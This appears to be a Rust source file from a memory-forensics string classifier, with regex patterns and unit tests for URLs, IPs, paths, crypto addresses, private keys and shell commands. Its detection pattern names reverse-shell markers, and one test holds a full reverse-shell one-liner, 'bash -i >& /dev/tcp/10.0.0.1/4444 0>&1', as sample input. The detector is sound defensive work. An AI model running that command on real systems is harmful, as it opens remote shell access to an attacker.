Skip to main content

memf_strings/
regex_classifier.rs

1//! Regex-based string classifier for URLs, IPs, emails, paths, and credentials.
2
3use crate::classify::StringClassifier;
4use crate::StringCategory;
5use regex::Regex;
6use std::sync::OnceLock;
7
8struct PatternEntry {
9    regex: Regex,
10    category: StringCategory,
11    confidence: f32,
12}
13
14/// Static (pattern, category, confidence) classification table.
15///
16/// Patterns are compile-time-constant and known-valid; building the live
17/// `PatternEntry` table filters out any that fail to compile (defence in
18/// depth) rather than panicking, so a future bad edit degrades to a missing
19/// category instead of an abort.
20const PATTERN_SPECS: &[(&str, StringCategory, f32)] = &[
21    (
22        "(?i)^https?://[^\\s<>\"'{}|\\\\^`\\[\\]]+$",
23        StringCategory::Url,
24        0.90,
25    ),
26    (
27        r"^(?:(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|\d)\.){3}(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|\d)$",
28        StringCategory::IpV4,
29        0.95,
30    ),
31    // IPv6: full 8-group, compressed (::), loopback (::1), etc.
32    // Covers RFC 5952 canonical forms without interface ID suffixes.
33    (
34        concat!(
35            r"^(?:[0-9a-fA-F]{1,4}:){7}[0-9a-fA-F]{1,4}$",
36            r"|^(?:[0-9a-fA-F]{1,4}:){1,7}:$",
37            r"|^::(?:[0-9a-fA-F]{1,4}:){0,6}[0-9a-fA-F]{1,4}$",
38            r"|^::$",
39            r"|^(?:[0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}$",
40            r"|^(?:[0-9a-fA-F]{1,4}:){1,5}(?::[0-9a-fA-F]{1,4}){1,2}$",
41            r"|^(?:[0-9a-fA-F]{1,4}:){1,4}(?::[0-9a-fA-F]{1,4}){1,3}$",
42            r"|^(?:[0-9a-fA-F]{1,4}:){1,3}(?::[0-9a-fA-F]{1,4}){1,4}$",
43            r"|^(?:[0-9a-fA-F]{1,4}:){1,2}(?::[0-9a-fA-F]{1,4}){1,5}$",
44            r"|^[0-9a-fA-F]{1,4}:(?::[0-9a-fA-F]{1,4}){1,6}$",
45        ),
46        StringCategory::IpV6,
47        0.95,
48    ),
49    (
50        r"^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$",
51        StringCategory::Email,
52        0.90,
53    ),
54    (
55        r"^/(?:usr|etc|var|tmp|home|opt|dev|proc|sys|root|bin|sbin|lib|mnt|run|srv)/[^\s:*?<>|]+$",
56        StringCategory::UnixPath,
57        0.85,
58    ),
59    (
60        r"(?i)^[A-Z]:\\(?:[^\\/:*?<>|\r\n]+\\)*[^\\/:*?<>|\r\n]*$",
61        StringCategory::WindowsPath,
62        0.85,
63    ),
64    (
65        r"(?i)^HK(?:EY_(?:LOCAL_MACHINE|CURRENT_USER|CLASSES_ROOT|USERS|CURRENT_CONFIG)|LM|CU|CR)\\",
66        StringCategory::RegistryKey,
67        0.95,
68    ),
69    (
70        r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$",
71        StringCategory::CryptoAddress,
72        0.70,
73    ),
74    (r"^0x[0-9a-fA-F]{40}$", StringCategory::CryptoAddress, 0.80),
75    (
76        r"^bc1[a-zA-HJ-NP-Z0-9]{25,39}$",
77        StringCategory::CryptoAddress,
78        0.85,
79    ),
80    (
81        r"-----BEGIN (?:RSA |EC |OPENSSH |DSA )?PRIVATE KEY-----",
82        StringCategory::PrivateKey,
83        0.99,
84    ),
85    (
86        r"^[A-Za-z0-9+/]{20,}={0,2}$",
87        StringCategory::Base64Blob,
88        0.40,
89    ),
90    (
91        r"/dev/tcp/|/dev/udp/|pty\.spawn|os\.dup2\(|bash\s+-i\s+>&",
92        StringCategory::ShellCommand,
93        0.90,
94    ),
95];
96
97fn patterns() -> &'static [PatternEntry] {
98    static PATTERNS: OnceLock<Vec<PatternEntry>> = OnceLock::new();
99    PATTERNS.get_or_init(|| {
100        PATTERN_SPECS
101            .iter()
102            .filter_map(|(pat, category, confidence)| {
103                Regex::new(pat).ok().map(|regex| PatternEntry {
104                    regex,
105                    category: category.clone(),
106                    confidence: *confidence,
107                })
108            })
109            .collect()
110    })
111}
112
113/// A classifier that uses compiled regexes to categorize strings.
114pub struct RegexClassifier;
115
116impl StringClassifier for RegexClassifier {
117    fn name(&self) -> &str {
118        "regex"
119    }
120
121    fn classify(&self, input: &str) -> Vec<(StringCategory, f32)> {
122        let mut results = Vec::new();
123        for entry in patterns() {
124            if entry.regex.is_match(input) {
125                results.push((entry.category.clone(), entry.confidence));
126            }
127        }
128        results
129    }
130}
131
132inventory::submit!(&RegexClassifier as &'static dyn StringClassifier);
133
134#[cfg(test)]
135mod tests {
136    use super::*;
137
138    fn classify(input: &str) -> Vec<(StringCategory, f32)> {
139        RegexClassifier.classify(input)
140    }
141
142    #[test]
143    fn classifies_url() {
144        let r = classify("https://evil.com/payload.exe");
145        assert!(r.iter().any(|(c, _)| *c == StringCategory::Url));
146    }
147
148    #[test]
149    fn classifies_ipv4() {
150        let r = classify("192.168.1.1");
151        assert!(r.iter().any(|(c, _)| *c == StringCategory::IpV4));
152    }
153
154    #[test]
155    fn classifies_email() {
156        let r = classify("user@example.com");
157        assert!(r.iter().any(|(c, _)| *c == StringCategory::Email));
158    }
159
160    #[test]
161    fn classifies_unix_path() {
162        let r = classify("/etc/passwd");
163        assert!(r.iter().any(|(c, _)| *c == StringCategory::UnixPath));
164    }
165
166    #[test]
167    fn classifies_windows_path() {
168        let r = classify("C:\\Windows\\System32\\cmd.exe");
169        assert!(r.iter().any(|(c, _)| *c == StringCategory::WindowsPath));
170    }
171
172    #[test]
173    fn classifies_registry_key() {
174        let r = classify("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft");
175        assert!(r.iter().any(|(c, _)| *c == StringCategory::RegistryKey));
176    }
177
178    #[test]
179    fn classifies_ethereum_address() {
180        let r = classify("0x742d35Cc6634C0532925a3b844Bc9e7595f2bD28");
181        assert!(r.iter().any(|(c, _)| *c == StringCategory::CryptoAddress));
182    }
183
184    #[test]
185    fn classifies_pem_private_key() {
186        let r = classify("-----BEGIN RSA PRIVATE KEY-----");
187        assert!(r.iter().any(|(c, _)| *c == StringCategory::PrivateKey));
188    }
189
190    #[test]
191    fn classifies_shell_command() {
192        let r = classify("bash -i >& /dev/tcp/10.0.0.1/4444 0>&1");
193        assert!(r.iter().any(|(c, _)| *c == StringCategory::ShellCommand));
194    }
195
196    #[test]
197    fn no_match_for_garbage() {
198        let r = classify("xyzq");
199        assert!(r.is_empty());
200    }
201
202    #[test]
203    fn classifies_btc_legacy_address() {
204        // BTC legacy addresses start with 1 or 3
205        let r = classify("1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa");
206        assert!(r.iter().any(|(c, _)| *c == StringCategory::CryptoAddress));
207    }
208
209    #[test]
210    fn classifies_btc_bech32_address() {
211        // BTC bech32 addresses start with bc1
212        let r = classify("bc1qw508d6qejxtdg4y5r3zarvary0c5xw7kv8f3t4");
213        assert!(r.iter().any(|(c, _)| *c == StringCategory::CryptoAddress));
214    }
215
216    #[test]
217    fn classifies_base64_blob() {
218        let r = classify("SGVsbG8gV29ybGQhIFRoaXMgaXMgYSBiYXNlNjQgdGVzdA==");
219        assert!(r.iter().any(|(c, _)| *c == StringCategory::Base64Blob));
220    }
221
222    #[test]
223    fn classifier_name() {
224        let classifier = RegexClassifier;
225        assert_eq!(classifier.name(), "regex");
226    }
227
228    #[test]
229    fn classifies_http_url() {
230        let r = classify("http://example.com/page");
231        assert!(r.iter().any(|(c, _)| *c == StringCategory::Url));
232    }
233
234    #[test]
235    fn classifies_private_key_variants() {
236        let r = classify("-----BEGIN PRIVATE KEY-----");
237        assert!(r.iter().any(|(c, _)| *c == StringCategory::PrivateKey));
238
239        let r2 = classify("-----BEGIN EC PRIVATE KEY-----");
240        assert!(r2.iter().any(|(c, _)| *c == StringCategory::PrivateKey));
241
242        let r3 = classify("-----BEGIN OPENSSH PRIVATE KEY-----");
243        assert!(r3.iter().any(|(c, _)| *c == StringCategory::PrivateKey));
244    }
245
246    #[test]
247    fn classifies_ipv6_full() {
248        // Full 8-group IPv6 address
249        let r = classify("2001:0db8:85a3:0000:0000:8a2e:0370:7334");
250        assert!(
251            r.iter().any(|(c, _)| *c == StringCategory::IpV6),
252            "expected IpV6 classification for a full IPv6 address"
253        );
254    }
255
256    #[test]
257    fn classifies_ipv6_compressed() {
258        // Compressed IPv6 with :: notation
259        let r = classify("::1");
260        assert!(
261            r.iter().any(|(c, _)| *c == StringCategory::IpV6),
262            "expected IpV6 classification for loopback ::1"
263        );
264    }
265
266    #[test]
267    fn classifies_ipv6_mixed_notation() {
268        // Mixed IPv4/IPv6 compressed form
269        let _r = classify("fe80::1%eth0");
270        // This may or may not match depending on whether we include interface IDs;
271        // at minimum fe80::1 without the interface suffix must match.
272        let r2 = classify("fe80::1");
273        assert!(
274            r2.iter().any(|(c, _)| *c == StringCategory::IpV6),
275            "expected IpV6 classification for fe80::1 link-local"
276        );
277    }
278}